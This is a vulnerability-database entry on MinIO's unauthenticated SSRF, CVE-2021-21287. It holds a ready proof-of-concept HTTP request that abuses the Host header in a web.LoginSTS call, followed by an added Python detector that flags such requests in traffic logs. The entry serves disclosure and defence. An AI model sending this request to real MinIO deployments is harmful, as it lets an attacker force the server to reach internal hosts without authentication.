841 B / 2021-05-21 09:14:38
# MinIO Unauthenticated SSRF (CVE-2021-21287)
    
For the full analysis, see PHITHON's "Containers Meet the Cloud: a Test of MinIO" (「容器与云的碰撞——一次对MinIO的测试」): https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html
    
A reproduction walkthrough is available at: https://www.o2oxy.cn/3104.html
    
PoC (raw HTTP request; the fence is tagged `http` rather than `bash`, and the Content-Length now matches the 76-byte body):

```http
POST /minio/webrpc HTTP/1.1
Host: 192.168.1.142:4444
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Content-Type: application/json
Content-Length: 76

{"id":1,"jsonrpc":"2.0","params":{"token":  "Test"},"method":"web.LoginSTS"}
```
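The request above is telling from a defender's point of view: the JSON-RPC method is `web.LoginSTS`, yet the `Host` header points at a port (4444) that is not the MinIO listener. The vulnerable handler built its outbound STS request from the incoming `Host` header (and the forwarded-scheme headers), which is the mechanism the advisory and PHITHON's writeup describe. The following Python is an added detection example, not code from this wiki or from the MinIO project: it parses raw requests in the shape of the PoC and flags `web.LoginSTS` calls whose `Host` is not one of the hosts the service is legitimately reached on. `EXPECTED_MINIO_HOSTS` and the three sample requests are constructed for the example.

```python
"""Flag MinIO browser-API web.LoginSTS calls whose Host header does not point
at the MinIO service itself (the request pattern behind CVE-2021-21287).
Added example; the hosts and sample requests below are constructed."""
import json
from typing import Optional

# Hosts under which this MinIO deployment is legitimately reached (constructed
# for the example; in practice derive these from the server's endpoint config).
EXPECTED_MINIO_HOSTS = {"minio.internal:9000", "192.168.1.142:9000"}


def parse_raw_request(raw: str) -> tuple[str, str, dict, str]:
    """Split a raw HTTP/1.1 request into (method, path, headers, body).
    Header names are lower-cased so lookups are case-insensitive."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body.strip()


def classify_request(raw: str, expected_hosts=EXPECTED_MINIO_HOSTS) -> Optional[str]:
    """Return a reason string when the request looks like a LoginSTS SSRF
    attempt, or None when it is not a LoginSTS call or the Host is expected."""
    _method, path, headers, body = parse_raw_request(raw)
    if path.split("?", 1)[0] != "/minio/webrpc":
        return None
    try:
        rpc = json.loads(body)
    except json.JSONDecodeError:
        return None
    if rpc.get("method") != "web.LoginSTS":
        return None
    host = headers.get("host", "")
    if host not in expected_hosts:
        return f"web.LoginSTS with foreign Host header {host!r}"
    # The forwarded scheme also fed the outbound URL; anything but http/https
    # is worth a look even when the Host itself is expected.
    scheme = headers.get("x-forwarded-proto", "")
    if scheme and scheme not in ("http", "https"):
        return f"web.LoginSTS with unexpected X-Forwarded-Proto {scheme!r}"
    return None


# Constructed sample traffic: the first mirrors the PoC shape, the second is a
# LoginSTS call from the service's own host, the third is a different method.
SUSPICIOUS_REQUEST = (
    "POST /minio/webrpc HTTP/1.1\r\n"
    "Host: 192.168.1.142:4444\r\n"
    "Content-Type: application/json\r\n"
    "Content-Length: 76\r\n"
    "\r\n"
    '{"id":1,"jsonrpc":"2.0","params":{"token":  "Test"},"method":"web.LoginSTS"}'
)
BENIGN_REQUEST = SUSPICIOUS_REQUEST.replace("192.168.1.142:4444", "minio.internal:9000")
OTHER_METHOD_REQUEST = BENIGN_REQUEST.replace("web.LoginSTS", "web.Login")


def scan(requests: list[str]) -> list[str]:
    """Return the reasons for every request that was flagged."""
    return [r for r in (classify_request(req) for req in requests) if r]


if __name__ == "__main__":
    for reason in scan([SUSPICIOUS_REQUEST, BENIGN_REQUEST, OTHER_METHOD_REQUEST]):
        print("ALERT:", reason)
```

Only the PoC-shaped request is reported; a `web.LoginSTS` call that arrives under the service's own host, and calls to other browser-API methods, pass through. Feed `classify_request` the raw requests from a reverse-proxy capture or a WAF log to apply the same check to live traffic.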
    
References:

* https://github.com/minio/minio/security/advisories/GHSA-m4qq-5f7c-693q
* https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html
* https://www.o2oxy.cn/3104.html
    